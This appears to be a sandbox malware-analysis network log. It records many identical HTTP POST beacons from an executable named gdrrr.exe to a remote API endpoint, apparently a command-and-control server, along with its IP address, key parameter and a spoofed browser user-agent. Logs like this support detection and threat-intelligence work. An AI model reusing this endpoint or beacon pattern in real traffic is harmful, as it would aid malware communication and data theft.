Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
DNS

29.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.243.111.52.in-addr.arpa

IN PTR

Response
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

gdrrr.exe

Remote address:

13.248.169.48:80

Request

POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
POST

http://uehge4g6gh.2ihsfa.com/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5

